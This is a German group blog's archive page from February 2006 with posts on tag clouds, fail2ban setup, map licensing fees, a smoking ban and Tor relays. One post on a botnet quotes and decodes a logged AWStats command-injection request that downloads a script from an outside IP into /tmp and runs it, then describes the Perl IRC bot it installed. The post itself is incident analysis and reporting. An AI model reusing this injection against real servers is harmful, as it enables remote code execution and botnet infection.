Archiv für Februar 2006

Tagwolke

von MichiK am 20. Februar 2006 um 07:43 Uhr

Wir haben nun auch eine extrem coole Tag-Wolke, zu erreichen über die Navigation rechts (die ich direkt dann mal etwas anders aufgeteilt hab). Das Vieh hat mich ganz schön Nerven gekostet, aber dafür sieht es irgendwie auch gut aus. Wir sind nun bereit fürs Web 2.0… ;)

Warum der Kram? Mir ist zufällig das WordPress-Plugin über den Weg gelaufen, was Tags implementiert und weil ich sowieso mit den Kategorien unzufrieden war (fast alles landet in “Geek Stuff” und/oder “Real Life”) habe ich damit mal rumgespielt. So ist es einfach flexibler…

/dev/radio 53

von ssc am 19. Februar 2006 um 15:12 Uhr

Heute gab es eine sehr amüsante Ausgabe vom /dev/radio,
featuring ssc als der böse Geist aus dem Gaestebuch :)

Jetzt gibts hier auch Tags

von MichiK am 19. Februar 2006 um 13:43 Uhr

Jeder kennt sie von flickr, technorati usw.: Tags. Die gibts hier jetzt auch. Ich muss dem Ding hier jetzt nur noch beibringen, dass es die Tags auch anzeigt und eine “Tag-Wolke” erzeugt.

P.S.: Ein paar Regeln für alle, die hier schreiben: Kleinbuchstaben sollten es sein, Leerzeichen sind erlaubt. Fnord. ;)

ssc spielt mit

von ssc am 19. Februar 2006 um 13:38 Uhr

Hallo Leser,

ich bin der ssc und spiel ab heute bei den Amish Geeks mit.
An Informationen zu meiner Person könnt ihr euch unter about.unixgu.ru ergötzen.

Was wird das nun für Auswirkungen auf dieses Blog haben?
Ihr könnt euch auf mehr Rants und Links über Unix, Netzwerkeln, Privatsphäre und Hippiekram freuen.
Desweiteren werde ich mich für die Einführung einer neuen Kategorie – “Linux Bashing” – stark machen.

Gruss, ssc

Portsentry und die Illuminaten

von Khark am 19. Februar 2006 um 04:17 Uhr

Entweder haben die Illuminaten dafür gesorgt, das Portsentry nicht mehr weiterentwickelt wird – oder der Entwickler ist ein Illuminat. *omfg*
– Man achte auf das Datum der letzten Änderung.

Portsentry Developement end-date

fail2ban

von Khark am 19. Februar 2006 um 00:45 Uhr

Da die SSH-Angriffe doch wieder etwas stärker zugenommen haben, habe ich mich mal entschlossen das ganze mit fail2ban etwas genauer zu betrachten und dynamische Vorkehrungen zu treffen. (Was für ein Ausdruck :D)

Unter http://www.the-art-of-web.com/system/fail2ban/ gibt es dazu dann auch eine kleine nette Anleitung. Ich musste nur, unter Debian Sarge, das fail2ban-Paket manuell per wget herunterladen und mit “dpkg -i paketname” installieren, anstatt dies wie in der Anleitung mit “apt-get -t unstable install paketname” zu tun.

Die anschließende Konfiguration erfolgt über die Datei /etc/fail2ban.conf. Anschließend einmal restarten und evtl. noch das Logfile ( /var/log/fail2ban.log ) in den Logfiles-Screen mitaufnehmen, fertig.
Das Logfile an sich ist selbsterklärend. Ansonsten gibt es noch eine nette Anleitung unter http://www.the-art-of-web.com/system/fail2ban-log/ in der sich auch ein cooles Beispiel findet, wie man sich die gebannten Einträge, nach Häufigkeit sortiert, ausgeben lassen kann.

Ich freue mich jedenfalls drauf, wenn jemand das nächste mal einen SSH brute-force versucht :D

Die Baustelle

von MichiK am 18. Februar 2006 um 04:13 Uhr

Ich habe grade noch einige Bekannte nach Hause gebracht. Ich war auf einer vierspurigen Straße unterwegs und wollte links abbiegen. Pünktlich kurz vorher beginnt ein Baustellenbereich… überall Warnschilder, Absperrungen, gelbe Blinklichter – an Linksabbiegen ist nicht zu denken. Die einzige Methode, noch anders zum Ziel zu kommen, wäre gewesen, vorher abzubiegen – aber mal eben 100 Meter rückwärts fahren? – oder weiterzufahren und einen großen Umweg in Kauf zu nehmen.

Doch hier ist noch keine Baugrube und kein Verkehr weit und breit… eine Lücke in den Absperrungen, ein Zebrastreifen, ein Stück Bürgersteig und dann am nächsten Stück abgesenktem Bordstein wieder auf die Straße. Manchmal muss man einfach kreativ sein beim Autofahren…

Hat jemand zu viel Geld?

von MichiK am 17. Februar 2006 um 03:20 Uhr

Ich will ami.sh! http://ami.sh/geeks/ wäre doch eine kultige URL… Leider kostet die Domain 69,90 € im Jahr. Zufällig ein wohltätiger Spender anwesend?

Kartenausschnitte, Verwertungsgesellschaften und die Sinnlosigkeit des Geldes

von Khark am 16. Februar 2006 um 21:45 Uhr

Irgendwie ist heute mal wieder zum Kotzen.
Beim Überfliegen eines ADAC Stadtplans von Bielefeld entdeckte ich ein Gebäude, das mit “Desinf.-anst.” abgekürzt ist, also scannt man den kleinen Bereich ein, umrandet des Gebäude grün und schreibt “Sitz der Bielefelder Desinformationsanstalt!” darunter.
Dann schreibt man einen kleinen, witzig gemeinten Blogeintrag dazu und published das ganze in seinem Lieblingsblog.

Dank unserer Zielgruppe wird dann nur 7 Stunden später darauf hingewiesen, das dies Ärger geben könnte. Nach kurzer Recherche stelle ich fest, das der Ärger bei etwas um die 1.000€ – 1.500€ liegen könnte.
Also informiert man sich mal, wieviel den so ein Kartenausschnitt kostet, wenn man ihn lizensiert.

Von http://www.geka-online.de/lizenzen_cartotravel.html:
Für die private/nicht-kommerzielle Nutzung von Verbrauchern und sonstige gemeinnützig anerkannte Einrichtungen ohne Umsatz nach § 13 BGB n.F. fallen pro Kartenausschnitt und Server bzw. URL folgende Lizenzgebühren an:
bis DIN A6 183,00 EUR

So, 183€ für einen kleinen Kartenausschnitt aus dem Repertoire des CartoTravel Verlages, der auf der Karte 6cm breit und 7cm hoch ist.
6cm * 7cm = 42cm².
183€ / 42cm² = 4,357… – Somit kostet uns ein cm² knappe 4,36€.
– Für den privaten Gebrauch! Will man das ganze Gewerblich nutzen liegt der Preis bei 895,00€ bis DIN-A6 und somit bei 21,31€ pro cm² für mein Beispiel.

Finde ich irgendwie etwas viel für eine Wegbeschreibung. Und bringt mich auf die Idee mal zu recherchieren, wieviel berühmte Bilder der Kunstgeschichte pro cm² wert sind.

Ist ja wie in etwa der Vergleich des Wertes von Parfüm, Öl und Druckertinte.
Öl ist billiger als Parfüm und Druckertinte teurer als Parfüm.
Komisch, das die Herstellungskosten genau entgegengesetzt verlaufen. Und Öl am teuersten ist, während Druckertinte die geringsten Herstellungskosten hat.
(Anmerk.: Wie sonst soll man einen jahrmillionen Jahre dauernden Herstellungsprozess, der von Mensch technisch nicht vollzogen werden kann, sonst nennen?)
– Die Herstellungskosten von Stadtplänen würde mich auch mal interessieren, hat da jemand Links zu?

Also kommt man auf die Idee: Nachmalen und dabei umändern.
Aber *ätsch* das haben auch schon andere vor mir versucht. Und wenn die Ähnlichkeit mit bereits existierenden Karten zu groß ist, wird man trotzdem abgemahnt. Im Zweifelsfall eben von jedem Verlag der meint in dem Bild einen Ausschnitt aus einer seiner Karten erkennen zu können.
– Die GEKA macht dies mit ihren digitalen Denunzianten ja voll automatisiert.

Dies animierte mich dann spontan dazu eine Linkkategorie: “Das Leben wäre schöner ohne:” zu begründen.
Die ersten die sich in dieser Gruppe wiederfinden sind: die GEKA , die VG-Wort und die GEZ.
Günther Freiherr von Gravenreuth ist wieder aus dieser Liste geflogen, weil ich die Liste nicht benutzen will um Privatpersonen zu beleidigen.
Bei Herrn Syndikus bin ich noch, wegen seiner Doppelmoral, am überlegen.

Die GEKA schaffte es aufgrund ihrer übertriebenen Preisvorstellungen in die Kategorie, die VG-Wort als Dankeschön für die Abgaben auf PCs und Drucker und die GEZ da ich, wenn ich 100% ehrlich sein wollte, ich für meine PCs Radio- und Fernsehgebühren bezahlen müsste, obwohl ich, mangels DVB-T und Radiokarte o.ä. gar nicht in der Lage bin an diesen Radio zu hören oder Fernsehen zu sehen.
– Ich könnte, ja. Ich könnte die GEZ auch in die Luft sprengen. Ins Gefängniss komme ich deswegen aber nicht, also wieso soll ich dann dafür zahlen?

Nun mag mancher sagen: Du kannst doch im Internet Radio hören und TV gucken. Stimmt auch.
Aber da hat sich ja zumindest ja schon bei den Internetradios die GEMA eingeklemmt und etlichen den Todesstoß verpasst.
Wobei ich da sagen muss, das die Tarife durchaus fair sind. 1€ pro Monat und Hörer, wenn man nicht mehr ab 100 Hörer hat – was für die meisten Hobbyradio ausreichen dürfte.

Aber ich mag die GEMA allgemein nicht :D

Sowas, liebe Leser nennt sich verfasserische Freiheit.
Und darauf muss man (noch) keine Abgaben zahlen.

Irgendwie ist das alles gerade zum kotzen..

Die spinnen, die Briten

von MichiK am 16. Februar 2006 um 17:09 Uhr

http://www.heise.de/newsticker/meldung/69718:

Dabei geht es laut BBC News um Befürchtungen, für Vista vorgesehene Sicherheits- und Kopierschutzfunktionen könnten dafür sorgen, dass polizeiliche Ermittler Dateien auf Computern von Verdächtigen nicht lesen können, da sie verschlüsselt seien.

No further comment…

Kunstparker des Jahres

von MichiK am 15. Februar 2006 um 20:56 Uhr

Ich schicke von Zeit zu Zeit Fotos von diversen Aktionskunstwerken an kunstparker.de. Übrigens genau die richtige Seite für alle, die es auch hassen, wenn Leute absolut keine Manieren beim Parken haben… ;)

Jedenfalls wurde dort jetzt ein von mir fotografiertes Kunstwerk zum Kunstparker des Jahres 2005 gekürt.

*freu*

Cheney auf der Jagd

von MichiK am 15. Februar 2006 um 05:06 Uhr

Dass US-Vizepräsident Dick Cheney auf einem Jagdausflug versehentlich einen Begleiter angeschossen hat, wandert ja nun schon einige Tage durch die Medien. Doch wie ich grade las, scheint der gute Mann (das Opfer, nicht Cheney!) nun einen Herzinfarkt erlitten zu haben, weil eins der Schrotkörner, das er abbekommen hat, in Richtung Herz gewandert ist. Ohne jetzt makaber wirken zu wollen: Wenn der Mann nun daran stirbt und Cheney wegen Mordes angeklagt und zu Knast oder vielleicht zum Tode verurteilt wird, lache ich mich kaputt.

Die Anklage wegen Mordes ist übrigens garnicht so unwahrscheinlich, wenn man einmal diesen Fall betrachtet… Ja, Äpfel und Birnen.

Rauchverbot

von MichiK am 15. Februar 2006 um 04:54 Uhr

Was haben Irland, Italien, Neuseeland, Norwegen, Schottland, Schweden und viele Bundesstaaten der USA sowie seit kurzem auch England gemeinsam?

Genau, dort darf in Gaststätten, Pubs usw. nicht mehr geraucht werden.

Ich will das hier auch!

Ich hasse verqualmte und verpestete Luft, die man in Scheiben schneiden und mit nach Hause nehmen kann. Ich hasse den anschließenden Gestank in Klamotten und Haaren. Ich hasse das Kratzen im Hals und das Jucken in den Augen sowie die Tatsache, dass das Bier in vergifteter Atmosphäre nicht mehr schmeckt.

Mein Onkel starb an Lungenkrebs. Er war jahrzehntelang starker Raucher. Auch Passivrauchen ist erwiesenermaßen schädlich.

Ja! Ich gestehe.

von MichiK am 15. Februar 2006 um 03:07 Uhr

Ich habe hochgeladen

Ich habe in der Vergangenheit Filesharing-Netze (BitTorrent, das eDonkey-Netz und auch andere…) genutzt und dabei nicht nur Daten heruntergeladen, sondern auch mit anderen Nutzern geteilt. Das ist per Definition erst einmal weder illegal noch sonst irgendwie verwerflich.

Wo ist eigentlich Barcelona?

von MichiK am 13. Februar 2006 um 23:01 Uhr

Wenn man den Werbeartikeln der Firma Karmez, wie sie beispielsweise in meiner favorisierten Pizza- und Dönerbude hier im Ort zu finden sind, glauben will, liegt es auf halbem Weg zwischen dem Mittelmeer und der Biskaya. Wenn ich mich richtig erinnere, ist Barcelona aber eine Mittelmeerstadt…

Außerdem liegt laut dieser Firma Mailand an der Adria, Paris auf der halben Strecke zwischen Bordeaux und Lyon und Frankfurt am Main in Baden-Württemberg.

Zu allem Überfluss kommt dann noch dazu, dass sie nichtmal konsequent sind, sondern die Punkte im Flash-Intro der Webseite noch wieder leicht woanders platziert haben.

Das nächste Mal bitte in den Atlas schauen, bevor Punkte auf der Karte gemalt werden! ;)

Auf den Werbeartikeln ist übrigens “Good Appetite” groß geschrieben, während “guten appetit” vollständig in Kleinschreibung gesetzt ist…

Schlecht recherchierter “City Guide”

von MichiK am 13. Februar 2006 um 22:50 Uhr

Mir ist hier ein “City Guide” der Firma Vista Point in die Hände gefallen, der sich mit meinem – jetzt ja schon nicht mehr ganz so neuen – Wohnort Leipzig befasst. Grund genug, sich den mal aus der Nähe anzuschauen. Danach hat man dann Gründe genug, ihn so wieder wegzuschmeißen, weil man damit kaum was anfangen kann…

Dick und fett steht auf dem Plan etwas von “Neuauflage 2006″ – man darf also aktuelle Informationen erwarten. Mit an Bord sein soll auch ein Stadtplan – der allerdings nicht viel mehr als eine erweiterte Übersicht der Innenstadt und ein bisschen drumherum ist. Meine Straße ist dort beispielsweise garnicht eingezeichnet. Ein richtiger Stadtplan ist was anderes. Außerdem ist ein Plan des Straßenbahn-Netzes dabei. Ja. Aber von wann ist der? Eingezeichnet ist eine Linie 13 – die ich noch nie gesehen habe – und die anderen Linien verlaufen zur Zeit sicherlich nicht so, wie auf dem Plan eingezeichnet.

Gut – der andere Linienverlauf ist nur temporär, aber nun schon seit einigen Monaten so – und es wird wohl auch noch einige Zeit dauern, bis die Linien wieder wie vorher fahren werden. Zumindest hätte man ja mal erwähnen können, dass die beiden zentralen Innenstadt-Haltestellen (Hauptbahnhof und Wilhelm-Leuschner-Platz) zur Zeit einfach nur große Baustellen sind. Der Grund für einige Bauarbeiten wird schließlich in dem tollen Heft auch erwähnt – der City-Tunnel. Er wird allerdings als “erste Leipziger U-Bahn” bezeichnet. Hat schon mal jemand eine U-Bahn gesehen, die von Nahverkehrszügen und S-Bahnen bedient wird?

Der krasseste Fehler ist allerdings auf Seite 59 in der Abteilung “Wichtige Rufnummern” zu finden. Dort ist nicht die Telefon-Vorwahl von Leipzig (0341) sondern die von Kiel (0431) angegeben… Zahlendreher hin oder her. Aber doch bitte nicht an einer so exponierten Stelle…

Man merkt: Schnell zusammengeschusterte Informationen, die nicht richtig überprüft und noch einmal auf Fehler quergelesen wurden. Hätte ich Geld dafür ausgegeben, würde ich jetzt fluchen.

Botnets sind nicht witzig

von Khark am 12. Februar 2006 um 21:39 Uhr

Mit einem kleinen Eintrag in der access.log meines Apachen fing alles an.

GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp
%3bwget%20211%2e234%2e113%2e241%2fscripz
%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|

In ASCII dekodiert ergibt sie folgendes:

GET /awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 211.234.113.241/scripz;chmod +x scripz;./scripz;echo YYY;echo|

Irgendjemand versuchte da eine der zahlreichen AWStats Sicherheitslücken auszunutzen und irgendwas auf anfälligen Server auszuführen.
Da es Sonntag ist und ich sowieso nichts weiter vorhatte, guckt man sich die Datei “211.234.113.241/scripz” mal an.
Es ist ein kleines Bash-Skript, das 2 weitere Dateien zieht.
219.84.105.36.42/ping und 219.84.105.36.42/httpd.
Ping ist ein binary. Und da meine Code-Audit-Fähigkeiten bei Binaries komplett aufhören lassen wir es mal außer acht :D

httpd hingegen ist ein kleiner IRC-Client in Perl, der dafür sorgt das sich alle infizierten Clients in Undernet in einem Channel sammeln und sich mit einem “Hallo, hier bin ich.” melden.

In eben jenen Channel bin ich dann auch mal spontan gegangen und hatte eine nettes sinnloses Gespräch mit einem der 3 Betreiber des Botnets.

Zitat:
<xxx> the botnet is just something for fun :)
<xxx> nothing else
[...]
<xxx> i run the bots with the uid that the apache servere is started
<xxx> nothing more
[...]
[We are scanning...]
<xxx> mambo awstats and xmlrpc
<xxx> and other php bugs :P
<xxx> try to patch your server…

Tjojo.. Schon spannend so ein Ausflug in die Welt der krassen Hacker.
Und wie schön, das mein Apache noch nichtmal PHP geschweige den Perl kennt.
– Die Serverbetreiber sind informiert und ich hoffe sie lesen die Mail auch.

Update:
Der Serveroperator hat die Mail gelesen und sich ganz nett für den Tipp bedankt.
Laut seiner Aussage verfolgt er diese “Malware” schon seit Monaten, aber diesmal sei es das erste mal, das sich ein Channel der Malware im Undernet befindet.
Die Betreiber der infizierten Maschinen werden informiert und sie versuchen zu verhindern, das die Botnet-Betreiber nochmal das Undernet missbrauchen. (Was aber wohl sehr schwer werden dürfte..)

Merke:

von MichiK am 12. Februar 2006 um 20:43 Uhr

Reboote niemals auf einen Rechner, der weiter als ein paar Häuser von dir entfernt steht, wenn du dir nicht absolut sicher bist, dass er nach dem Reboot wieder vernünftig startet.

Bei Servern im Rechenzentrum hat man ja wenigstens eine Console oder zumindest Remote Hands. Bei einem Rechner in meiner Wohnung in Leipzig sieht das dann schon wieder anders aus. :(

Yeah!

von Khark am 11. Februar 2006 um 11:58 Uhr

Feb 10 13:56:10 ip.ip.ip.ip sshd[4793]: Illegal user 9999 from 64.27.4.67

Scheint so, als wäre wieder alles in Ordnung.

Gibt es eine Art “Größte Zeitspanne ohne SSH brute force Angriff”-Highscorer?
Also sowas wie der Uptime Daemon nur für SSH.

Der zweite Tor-Server

von MichiK am 11. Februar 2006 um 03:51 Uhr

Bevor ich es vergesse… Vor einigen Tagen ist mir aufgefallen, dass ich ja einen Server habe und den kaum nutze (ein paar hundert Mails am Tag und das wars…) aber dort seit kurzem nicht mehr 30 sondern 250 GB Freitraffic pro Monat habe. Ratet mal…

Genau: Ich habe sofort einen Tor-Node draus gemacht. ;)